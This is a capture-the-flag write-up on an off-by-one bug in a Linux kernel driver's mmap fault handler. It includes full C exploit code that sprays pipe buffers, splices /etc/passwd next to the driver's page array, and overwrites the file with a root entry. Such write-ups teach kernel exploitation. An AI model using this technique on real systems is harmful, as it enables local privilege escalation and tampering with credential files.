Faulty Kernel is a fun kernel challenge, where I learn more on how drivers deal with mmap memory.
When opening the driver, the driver allocates a page array of size 0x400 and attaches the shared_buffer
in the filp->private_data
.
static int dev_open(struct inode* inodep, struct file* filp) {
int i;
struct shared_buffer* sbuf;
sbuf = kzalloc(sizeof(*sbuf), GFP_KERNEL);
sbuf->pagecount = PAGECOUNT;
// this is in kmalloc 0x400
sbuf->pages = kmalloc_array(sbuf->pagecount, sizeof(*sbuf->pages), GFP_KERNEL);
for (i = 0; i < sbuf->pagecount; i++) {
// alloc_page also automatically set ref count to 1
sbuf->pages[i] = alloc_page(GFP_KERNEL);
if (!sbuf->pages[i]) {
printk(KERN_ERR "[dev] Failed to allocate page %d.\n", i);
goto fail_alloc_pages;
}
}
filp->private_data = sbuf;
return SUCCESS;
}
Upon doing mmap on the file descriptor
returned from dev_open
, we can create a vma with custom vm_ops
and vm_private_data
. Thus, when we fault on the faulting address, the driver can do custom hooks and stuff to the address.
static int dev_mmap(struct file* filp, struct vm_area_struct* vma) {
struct shared_buffer* sbuf = filp->private_data;
pgoff_t pages = vma_pages(vma);
// ensure that we allocate a vma
// where the size is less than the number of pages
if (pages > sbuf->pagecount) {
// mmapping a size > PAGECOUNT will error here
return -EINVAL;
}
vma->vm_ops = &dev_vm_ops;
vma->vm_private_data = sbuf;
return SUCCESS;
}
The custom vm_ops is defined here:
static struct file_operations dev_fops = {
.owner = THIS_MODULE,
.open = dev_open,
.mmap = dev_mmap
};
And when faulting on the vma address:
static vm_fault_t dev_vma_fault(struct vm_fault *vmf) {
struct vm_area_struct *vma = vmf->vma;
struct shared_buffer *sbuf = vma->vm_private_data;
pgoff_t pgoff = vmf->pgoff;
// when pgoff > sbuf->pagecount, we segfault on userland
// there is an off by one here bug though
if (pgoff > sbuf->pagecount) {
return VM_FAULT_SIGBUS;
}
// else increment ref count of the page
get_page(sbuf->pages[pgoff]);
vmf->page = sbuf->pages[pgoff];
return SUCCESS;
}
There is an off by one bug in the dev_vma_fault
function. The check should abort when pgoff ≥ sbuf->pagecount
, since array indexing of the sbuf->pages
array starts from 0.
Example POC:
int main(void)
{
int chal_fd = open("/dev/challenge", O_RDWR);
// this means i am mapping the file at offset 127 * 0x1000
// hence accessing the sbuf->pages[127] at address 0x90000
void* mapped_addr = SYSCHK(mmap(0x90000, 10 * 0x1000,
PROT_READ | PROT_WRITE,
MAP_SHARED,
chal_fd, (127 * 0x1000)));
printf("mapped_addr: 0x%llx\n", mapped_addr);
int* ptr = (int*)((char*)mapped_addr + (2 * 0x1000));
mygetch("set bp");
*ptr = 42; // Write the value 42
}
What this gives us is we can oob in the page array, where the page fault *ptr
above will write in the page after the page array. If we can reliably place a page ptr after the page array, we can possibly write in that page! One thing to note is that the page must be VM_SHARED
. This is because in finish_fault
, the page will be vmf->cow_page
if its not VM_SHARED
, while the bug in dev_vma_fault
returns in vmf->page
. Hence, we need to take the SECOND BRANCH.
vm_fault_t finish_fault(struct vm_fault *vmf)
{
struct page *page;
vm_fault_t ret = 0;
/* Did we COW the page? */
if ((vmf->flags & FAULT_FLAG_WRITE) &&
!(vmf->vma->vm_flags & VM_SHARED))
// [1] this is the code path that is hit normally
page = vmf->cow_page;
else
// [2] the vmf->page is the one that is fake and went oob
page = vmf->page;
...
}
Now we look at how the write works on a normal page array:
Exploit Overview:
- Open
/dev/challenge
to spray the page array - Spray pipe buffer so the pipe buf is below our page array. Pipe buffer happens to be in 0x400, so it will land directly below the page array.
- Splice
/etc/passwd
so that the page is inside pipe buf and directly beneath the page array. This is a technique that I learn from dirty pipe. - Trigger page fault and the oob bug to overwrite
/etc/passwd
POC
int main(void)
{
pin_cpu(0);
int secrets_fd = SYSCHK(open("/etc/passwd", O_RDONLY));
struct stat stbuf;
int secret_size = stat("/etc/passwd", &stbuf); /* 2 syscalls */
printf("File size: %lld bytes\n", (long long)stbuf.st_size);
printf("pipe pipe pipe!\n");
int sprayer_pipes[0x30][2];
int new_pipes[2];
pipe(new_pipes);
uint64_t contents[0x1000/8];
memset(contents, 0x41, 0x1000);
int m_fd[0x10] = {0};
for (int i = 0; i < 1; i++){
m_fd[i] = open("/dev/challenge", O_RDWR);
}
for (int i = 0; i < 0x10; i++) {
if (pipe(sprayer_pipes[i]) < 0){
printf("Pipe err");
exit(EXIT_FAILURE);
}
}
off_t offset = 1;
int err = SYSCHK(splice(secrets_fd, &offset, new_pipes[1], NULL, (long long)stbuf.st_size, 0));
SYSCHK(write(new_pipes[1], contents, 0x1000));
memset(contents, 0x42, 0x1000);
SYSCHK(write(new_pipes[1], contents, 0x1000));
for (int i = 0; i < 0x10; i++){
offset = 0;
SYSCHK(splice(secrets_fd, &offset, sprayer_pipes[i][1], NULL, (long long)stbuf.st_size, 0));
SYSCHK(write(sprayer_pipes[i][1], contents, 0x1000));
SYSCHK(write(sprayer_pipes[i][1], contents, 0x1000));
}
void* mapped_addr = SYSCHK(mmap(0x90000, 10 * 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, m_fd[0], (128 * 0x1000)));
printf("mapped_addr: 0x%llx\n", mapped_addr);
const char* str = "root:$1$KHAVTUKO$GU3BysPeNf8W7hDrzo0bu/:0:0:root:/root:/bin/sh\nuser:x:1000:1000:Linux User,,,:/home/user:/bin/sh";
memcpy(mapped_addr, str, strlen(str) + 1); // +1 to include the null terminator
system("cat /etc/passwd");
// mygetch("Sleeping!");
}
Conclusion
After the CTF, the author mentioned that the intended way to exploit the bug was to do mremap
and expand the vma. There should have been a check on the pgoff in dev_mmap
. This is a pattern that he wrote based on the following blog: https://labs.bluefrostsecurity.de/blog/cve-2023-2008.html. Regardless, the challenge was fun, and I learned some new things!!